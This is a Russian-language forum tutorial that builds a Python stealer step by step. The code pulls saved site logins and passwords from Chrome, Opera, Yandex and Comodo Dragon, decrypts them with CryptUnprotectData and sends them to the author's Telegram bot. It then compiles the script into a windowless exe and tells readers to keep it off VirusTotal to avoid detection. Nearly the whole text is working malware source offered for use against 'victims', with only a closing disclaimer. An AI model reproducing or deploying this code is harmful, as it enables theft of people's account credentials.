В самом начале программы, мы должны подключить библиотеки, которые мы будем использовать в нашем коде.
from os import getlogin #из библиотеки os мы импортируем функцию getlogin
#данная библиотека поможет нам получить имя пользователя компьютера
import sqlite3 #импортируем библиотеку sqlite3
#данная библиотека даст возможность работать с базами данных
import win32crypt #импортируем библиотеку win32crypt
#эта библиотека поможет расшифровать пароли из базы данных
import telebot #импортируем библиотеку telebot
#с помощью этой библиотеки мы будем отправлять сообщения от нашего бота._______________________________________________________________________________
Теперь нам нужно задать переменные, которые мы будет использовать.
t0ken = "ВАШ:Т0КЕН"" #переменная t0ken – в которой хранится token от бота
b0t = telebot.TeleBot(t0ken) #создаем переменную b0t – которая отвечает за создание бота и имеет атрибут в виде переменной t0ken
i=0 #переменная счетчик
name_0f_user = getlogin() # переменная, которая с помощью функции getlogin получает имя учетной записи пользователя._______________________________________________________________________________
Дальше мы должны создать переменные,списки с директориями возможных браузеров.
op3ra = "C:\Users\" + name_0f_user + "\AppData\Roaming\Opera Software\Opera Stable\" + "Login data"
#переменная op3ra которая равна такому пути C:\Users\Users\AppData\Roaming\Opera Software\Opera Stable\LoginData - где Login Data - база данных, а остальное - путь к папке браузера.
g00gle = "C:\Users\" + name_0f_user + "\AppData\Local\Google\Chrome\User Data\Default\" + "Login Data" #также как и выше
yand3x = "C:\Users\" + name_0f_user + "\AppData\Local\Yandex\YandexBrowser\User Data\Default\" + "Login Data" #также как и выше
c0m0d0drag0n = "C:\Users\" + name_0f_user + "\AppData\Local\Comodo\Dragon\User Data\Default\" + "Login Data" #также как и выше
lsdir=[op3ra,g00gle,yand3x,c0m0d0drag0n] #создаем список в котором хранятся наши переменные с директориями браузеров.
lsbr0wser=["Opera","Google Chrome","Yandex Browser","Comodo Dragon"] #создаем список с названиями браузеров, которые у нас есть. Названия расположены в порядке списка lsdirЯ добавил только 4, как по мне самых распространенных браузеров. Вы можете сами добавлять другие браузеры на движке Chromium
При добавлении/редактировании директорий, нужно использовать двойной, обратный слэш(\), иначе будет выбивать ошибку,связанную с кодировкой.
_______________________________________________________________________________
Теперь приступим к расшифровке паролей и отправке полученных данных в телеграм.
b0t.send_message(ваш id, "Компьютер: " + name_0f_user) #для начала мы отправим в чат имя системы жертвы
#b0t - имя бота,которого мы создали в начале
#send_message - функция для отправки сообщения,которая принимает такие аргументы: id чата,который мы получили ранее и текст,который мы желаем отправить, в данном случае, слово "Компьютер:" объединенное с переменой name_0f_user
for i in range(len(lsdir)): #запускаем цикл, который будет длится от переменной i до длины списка lsdir, от 0 до 4
try: #попробовать сделать следующие действия, если не получится, то выполнить действия после except
br0wser=lsdir[i] #переменной br0wser присвоим элемент списка под номером [i]
connecti0n = sqlite3.connect(br0wser) #начинаем работу с sqllite, создаем переменную, которая равняется подключению базы данных, которая находится по адресу br0wser
curs0r = connecti0n.cursor() #создаем переменную curs0r, которая отвечает за создание объекта для взаимодействия с базой данных
curs0r.execute('SELECT origin_url, username_value, password_value FROM logins') #переменной curs0r мы говорим достать из базы данных нам такие значения - origin_url(ссылка на сайт где был введен логин и пароль),username_value(логин), password_value(пароль)
for ii in curs0r.fetchall(): #создаем цикл, который будет длится от нуля(ii), до всех значений, которые можно получить из базы данных(curs0r.fetchall)
d3cryptpass = win32crypt.CryptUnprotectData(ii[2]) #переменной d3cryptpass присваиваем значение расшифровки пароля(второго элемента в списке значений, добытых из базы данных), функцией CryptUnprotectData(библиотека win32crypt)
b0t.send_message(id_вашего_чата, lsbr0wser[i]) #в чат от имени бота отправляем сообщение с i-тым элементом из списка текстовых названий браузеров.
b0t.send_message(id_вашего_чата, "----------------------------") #отправляем от имени бота сообщение в чат с разделительной линией/украшением
b0t.send_message(id_вашего_чата, "Сайт: " + ii[0]) #в чат от имени бота отправляем слово "сайт" + нулевой элемент в списке
b0t.send_message(id_вашего_чата, "----------------------------") #отправляем от имени бота сообщение в чат с разделительной линией/украшением
b0t.send_message(id_вашего_чата, "Логин: " + ii[1]) #в чат от имени бота отправляем слово "логин" + первый элемент в списке
b0t.send_message(id_вашего_чата, "----------------------------") #отправляем от имени бота сообщение в чат с разделительной линией/украшением
d3cryptpass=str(d3cryptpass) #переменной d3cryptpass- присваиваем значение d3cryptpass, только переводим ее в текстовый тип данных(str)
b0t.send_message(id_вашего_чата, "Пароль: " + d3cryptpass) #в чат от имени бота отправляем слово "пароль" + переменную d3cryptpass
b0t.send_message(id_вашего_чата, "----------------------------") #отправляем от имени бота сообщение в чат с разделительной линией/украшением
except: #если действие после try не заработало/выдало ошибку, то выполнить действие после except
b0t.send_message(id_вашего_чата,"Браузер " + lsbr0wser[i] + " был запущен, или не установлен") #в чат от имени бота отправляем слово "браузер" + i-тый элемент в списке с названиями браузеров(lsbr0wser) + сообщение об ошибкеТеперь я попытаюсь объяснить суть вышеописанного кода на «простом» примере)
Жертва запускает наш стиллер, программа пробует(try) пройтись по нулевому элементу в списке и подключится к базе данных,если у нее это получается, то она собирает данные и отправляет в чат телеграм, если что-то не получается, то программа не крашится, а выполняет действие указанное(except) в случае ошибки. Дальше программа проходит второй круг(при втором круге счетчик i увеличивается на один), но уже по первому элементу в списке и выполняет все как и раньше. Так будет происходить, пока работает цикл, а он работает от нуля до длины списка с директориями.
Компилируем в exe
Ясное дело, что python скрипт мы не будем распространять, поэтому мы скомпилируем его в exe файл. Для компиляции нам нужно будет установить специальную утилиту pyinstaller для компиляции py в exe
После установки мы должны открыть папку с нашей программой на питоне и запустить pyinstaller с такими аргументами
-F соберет все файлы в один exe файл
-w отключит консоль
-i *путь к иконке* аргумент,который подключит к программе иконку
CD C:compile
pyinstaller -i i.ico -F -w stealer.py
#В терминала переходим в папку C:compile
#вызываем pyintaller, где i.ico - иконка расположенная в папке compile;stealer.py - наш питоновский скрипт, расположенный в папке compileПосле в папке dist появится наш код скомпилированный в EXE. У меня готовый стиллер запускается за 5 секунд и имеет вес в 6 мегабайт.
Проверить на детекты, я не смог, ибо viruschekmate,ScanMyBin — сдохли,nodstribute+virustotal — сливают данные(не суйте туда стиллер)), поэтому информация про «чистоту» остается для вас и для меня интригой)
Исходник и заключение
Исходники вы можете скачать по ссылке —
Пожалуйста,
Вход
или
Регистрация
для просмотра содержимого URL-адресов!
Посмотреть вложение 7365
Так приходят логи, пароль находится между символом b’ и ‘
Вся информация написана в целях ознакомления, автор не несет ответственность за использование данного материала